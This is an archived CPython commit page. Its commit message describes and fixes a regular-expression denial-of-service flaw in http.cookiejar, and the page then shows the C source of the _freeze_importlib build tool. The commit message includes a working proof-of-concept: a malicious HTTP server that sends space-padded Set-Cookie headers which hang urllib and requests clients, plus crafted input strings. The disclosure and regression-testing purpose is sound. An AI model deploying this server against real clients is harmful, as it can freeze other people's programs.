Staging
v0.5.1
v0.5.1
https://github.com/python/cpython
Revision cb6085138a845f8324adc011b65754acc2086cc0 authored by Miss Islington (bot) on 22 November 2019, 14:42:13 UTC, committed by GitHub on 22 November 2019, 14:42:13 UTC
The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular expression denial of service (REDoS). LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar to parse Set-Cookie headers returned by a server. Processing a response from a malicious HTTP server can lead to extreme CPU usage and execution will be blocked for a long time. The regex contained multiple overlapping \s* capture groups. Ignoring the ?-optional capture groups the regex could be simplified to \d+-\w+-\d+(\s*\s*\s*)$ Therefore, a long sequence of spaces can trigger bad performance. Matching a malicious string such as LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!") caused catastrophic backtracking. The fix removes ambiguity about which \s* should match a particular space. You can create a malicious server which responds with Set-Cookie headers to attack all python programs which access it e.g. from http.server import BaseHTTPRequestHandler, HTTPServer def make_set_cookie_value(n_spaces): spaces = " " * n_spaces expiry = f"1-c-1{spaces}!" return f"b;Expires={expiry}" class Handler(BaseHTTPRequestHandler): def do_GET(self): self.log_request(204) self.send_response_only(204) GH- Don't bother sending Server and Date n_spaces = ( int(self.path[1:]) GH- Can GET e.g. /100 to test shorter sequences if len(self.path) > 1 else 65506 GH- Max header line length 65536 ) value = make_set_cookie_value(n_spaces) for i in range(99): GH- Not necessary, but we can have up to 100 header lines self.send_header("Set-Cookie", value) self.end_headers() if __name__ == "__main__": HTTPServer(("", 44020), Handler).serve_forever() This server returns 99 Set-Cookie headers. Each has 65506 spaces. Extracting the cookies will pretty much never complete. Vulnerable client using the example at the bottom of https://docs.python.org/3/library/http.cookiejar.html : import http.cookiejar, urllib.request cj = http.cookiejar.CookieJar() opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj)) r = opener.open("http://localhost:44020/") The popular requests library was also vulnerable without any additional options (as it uses http.cookiejar by default): import requests requests.get("http://localhost:44020/") * Regression test for http.cookiejar REDoS If we regress, this test will take a very long time. * Improve performance of http.cookiejar.ISO_DATE_RE A string like "444444" + (" " * 2000) + "A" could cause poor performance due to the 2 overlapping \s* groups, although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was. (cherry picked from commit 1b779bfb8593739b11cbb988ef82a883ec9d077e) Co-authored-by: bcaller <bcaller@users.noreply.github.com>
1 parent d4d7920
Tip revision: cb6085138a845f8324adc011b65754acc2086cc0 authored by Miss Islington (bot) on 22 November 2019, 14:42:13 UTC
bpo-38804: Fix REDoS in http.cookiejar (GH-17157)
bpo-38804: Fix REDoS in http.cookiejar (GH-17157)
Tip revision: cb60851
_freeze_importlib.c
/* This is built as a stand-alone executable by the Makefile, and helps turn
Lib/importlib/_bootstrap.py into a frozen module in Python/importlib.h
*/
#include <Python.h>
#include <marshal.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#ifndef MS_WINDOWS
#include <unistd.h>
#endif
/* To avoid a circular dependency on frozen.o, we create our own structure
of frozen modules instead, left deliberately blank so as to avoid
unintentional import of a stale version of _frozen_importlib. */
static const struct _frozen _PyImport_FrozenModules[] = {
{0, 0, 0} /* sentinel */
};
#ifndef MS_WINDOWS
/* On Windows, this links with the regular pythonXY.dll, so this variable comes
from frozen.obj. In the Makefile, frozen.o is not linked into this executable,
so we define the variable here. */
const struct _frozen *PyImport_FrozenModules;
#endif
const char header[] = "/* Auto-generated by Programs/_freeze_importlib.c */";
int
main(int argc, char *argv[])
{
char *inpath, *outpath, *code_name;
FILE *infile = NULL, *outfile = NULL;
struct _Py_stat_struct status;
size_t text_size, data_size, n;
char *text = NULL;
unsigned char *data;
PyObject *code = NULL, *marshalled = NULL;
int is_bootstrap = 1;
PyImport_FrozenModules = _PyImport_FrozenModules;
if (argc != 3) {
fprintf(stderr, "need to specify input and output paths\n");
return 2;
}
inpath = argv[1];
outpath = argv[2];
infile = fopen(inpath, "rb");
if (infile == NULL) {
fprintf(stderr, "cannot open '%s' for reading\n", inpath);
goto error;
}
if (_Py_fstat_noraise(fileno(infile), &status)) {
fprintf(stderr, "cannot fstat '%s'\n", inpath);
goto error;
}
text_size = (size_t)status.st_size;
text = (char *) malloc(text_size + 1);
if (text == NULL) {
fprintf(stderr, "could not allocate %ld bytes\n", (long) text_size);
goto error;
}
n = fread(text, 1, text_size, infile);
fclose(infile);
infile = NULL;
if (n < text_size) {
fprintf(stderr, "read too short: got %ld instead of %ld bytes\n",
(long) n, (long) text_size);
goto error;
}
text[text_size] = '\0';
_PyCoreConfig config = _PyCoreConfig_INIT;
config.program_name = L"./_freeze_importlib";
/* Don't install importlib, since it could execute outdated bytecode. */
config._disable_importlib = 1;
Py_NoUserSiteDirectory++;
Py_NoSiteFlag++;
Py_IgnoreEnvironmentFlag++;
Py_FrozenFlag++;
_PyInitError err = _Py_InitializeFromConfig(&config);
/* No need to call _PyCoreConfig_Clear() since we didn't allocate any
memory: program_name is a constant string. */
if (_Py_INIT_FAILED(err)) {
_Py_FatalInitError(err);
}
if (strstr(inpath, "_external") != NULL) {
is_bootstrap = 0;
}
code_name = is_bootstrap ?
"<frozen importlib._bootstrap>" :
"<frozen importlib._bootstrap_external>";
code = Py_CompileStringExFlags(text, code_name, Py_file_input, NULL, 0);
if (code == NULL)
goto error;
free(text);
text = NULL;
marshalled = PyMarshal_WriteObjectToString(code, Py_MARSHAL_VERSION);
Py_CLEAR(code);
if (marshalled == NULL)
goto error;
assert(PyBytes_CheckExact(marshalled));
data = (unsigned char *) PyBytes_AS_STRING(marshalled);
data_size = PyBytes_GET_SIZE(marshalled);
/* Open the file in text mode. The hg checkout should be using the eol extension,
which in turn should cause the EOL style match the C library's text mode */
outfile = fopen(outpath, "w");
if (outfile == NULL) {
fprintf(stderr, "cannot open '%s' for writing\n", outpath);
goto error;
}
fprintf(outfile, "%s\n", header);
if (is_bootstrap)
fprintf(outfile, "const unsigned char _Py_M__importlib[] = {\n");
else
fprintf(outfile,
"const unsigned char _Py_M__importlib_external[] = {\n");
for (n = 0; n < data_size; n += 16) {
size_t i, end = Py_MIN(n + 16, data_size);
fprintf(outfile, " ");
for (i = n; i < end; i++) {
fprintf(outfile, "%d,", (unsigned int) data[i]);
}
fprintf(outfile, "\n");
}
fprintf(outfile, "};\n");
Py_CLEAR(marshalled);
Py_Finalize();
if (outfile) {
if (ferror(outfile)) {
fprintf(stderr, "error when writing to '%s'\n", outpath);
goto error;
}
fclose(outfile);
}
return 0;
error:
PyErr_Print();
Py_Finalize();
if (infile)
fclose(infile);
if (outfile)
fclose(outfile);
if (text)
free(text);
if (marshalled)
Py_DECREF(marshalled);
return 1;
}
![swh spinner](/static/img/swh-spinner.gif)
Computing file changes ...